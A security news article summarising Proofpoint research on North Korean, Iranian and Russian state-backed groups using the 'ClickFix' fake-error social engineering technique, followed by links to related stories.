State-sponsored hackers from North Korea, Iran, and Russia are exploiting the ‘ClickFix’ social engineering technique for the first time – and to great success.
Popular for some time with cyber crime groups, ClickFix is a social engineering practice that uses dialog boxes with instructions to copy, paste, and run malicious commands on the target’s machine.
The technique was first seen in early March last year, employed by initial access broker TA571 and the ClearFake cluster - but it soon spread far more widely.
According to researchers at Proofpoint, over a three-month period from the end of last year through the beginning of 2025, North Korea's TA457, Iran's TA450, and Russia's UNK_RemoteRogue and TA422 have all been making use of it.
"This creative technique not only employs fake error messages as the problem, but also an authoritative alert and instructions supposedly coming from the operating system as a solution," said Proofpoint.
Rather than revolutionizing their campaigns, the technique is replacing the installation and execution stages in existing infection chains. While it's currently limited to a few state-sponsored groups, Proofpoint said it expects the attack method to become more widely tested or adopted by threat actors.
North Korea's TA427 was first spotted using ClickFix at the beginning of this year, Proofpoint noted. The group targeted individuals in a handful of think tanks, masquerading as a Japanese diplomat and offering a meeting with the Japanese ambassador to the US, Shigeo Yamada.
Iran's TA450, meanwhile, used an attacker-controlled email address - support@microsoftonlines[.]com - to send an English-language phish to targets at more than 39 organizations in the Middle East.
They deployed the ClickFix technique by persuading the target to first run PowerShell with administrator privileges, then copy and run a command contained in the email body. Doing this installed remote monitoring software, allowing the group to conduct espionage and exfiltrate data from the target’s machine.
ClickFix abuse expected to surge
UNK_RemoteRogue has only used ClickFix once, researchers said. Notably, however, none of the aforementioned groups showed repeated use of the technique.
The security firm first hypothesized that this might be because it represented a trial period, or that the groups found the technique less successful than others for machine compromise.
With TA427 returning to ClickFix with a slightly varied infection chain in April, researchers now believe that the group is developing how it uses the ClickFix technique in its operations, and that more sightings are likely in the coming months.
One noteworthy finding from the Proofpoint research is that Chinese state-sponsored groups haven’t jumped on the bandwagon as of yet. This, researchers said, could change in the coming months.
"Given the technique’s trajectory around the world, there is a conspicuous absence in the use of ClickFix by a Chinese state-sponsored actor in Proofpoint investigations," said the firm.
"However, this is likely due to visibility, and there is a high probability that a China-nexus group has also experimented with ClickFix, given its appearance across many actors’ campaigns in a short period of time."
MORE FROM ITPRO
- The Iran cyber threat: Breaking down attack tactics
- Russia is targeting unpatched vulnerabilities – what can tech leaders do to shore up defenses?
- North Korean insider attacks are skyrocketing – dozens of US firms didn't spot the hacker in their midst
-
Hackers are using Zoom’s remote control feature to infect devices with malwareNews Security experts have issued an alert over a new social engineering campaign using Zoom’s remote control features to take over victim devices.
-
Have I Been Pwned owner Troy Hunt’s mailing list compromised in phishing attackTroy Hunt, the security blogger behind data-breach site Have I Been Pwned, has fallen victim to a phishing attack targeting his email subscriber list.
-
LinkedIn has become a prime hunting ground for cyber criminals – here’s what you need to knowNews Cyber criminals are flocking to LinkedIn to conduct social engineering campaigns, research shows.
-
Phishing campaign targets developers with fake CrowdStrike job offersNews Victims are drawn in with the promise of an interview for a junior developer role at CrowdStrike
-
Iranian hackers targeted nuclear expert, ported Windows infection chain to Mac in a weekNews Fresh research demonstrates the sophistication and capability of state-sponsored threat actors to compromise diverse targets
-
Malware being pushed to businesses by search engines remains a pervasive threatNews High-profile malvertising campaigns in recent months have surged
-
CISA: Phishing campaign targeting US federal agencies went undetected for monthsNews Threat actors used legitimate remote access software to maliciously target federal employees
-
Google Ads malvertising campaign prompts questions around Search securityNews A leading security researcher has called into question why Google still allows malware links to top search results
